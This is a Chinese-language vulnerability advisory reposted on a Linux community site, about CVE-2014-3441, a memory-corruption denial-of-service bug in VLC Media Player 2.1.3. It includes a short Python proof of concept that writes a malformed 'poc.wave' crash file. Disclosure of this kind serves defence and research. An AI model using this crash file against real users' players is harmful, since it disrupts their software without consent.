你好,游客 登录 注册 搜索
背景:
阅读新闻

VLC Media Player '.wav'文件内存破坏漏洞

[日期:2014-05-13] 来源:Linux社区  作者:Linux [字体: ]

发布日期:2014-05-09
更新日期:2014-05-13

受影响系统:
VideoLAN VLC Media Player 2.1.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 67315
 CVE(CAN) ID: CVE-2014-3441
 
VLC Media Player是多媒体播放器。
 
VLC Media Player 2.1.3 及其他版本存在内存破坏漏洞,攻击者可利用此漏洞造成拒绝服务。

推荐阅读:

Ubuntu 12.04安装最新版VLC2.0.2 http://www.linuxidc.com/Linux/2012-07/64542.htm

Ubuntu 14.04 用户如何安装 VLC 2.2.0  http://www.linuxidc.com/Linux/2014-03/98913.htm
 
<*来源:Aryan Bayaninejad
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
 data =
 "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
 outfile = file("poc.wave", 'wb')
 outfile.write(data)
 outfile.close()
 print "Created Poc"

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
VideoLAN
 --------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.videolan.org/

 

linux
本文评论   查看全部评论 (0)
表情: 表情 姓名: 字数

       

评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款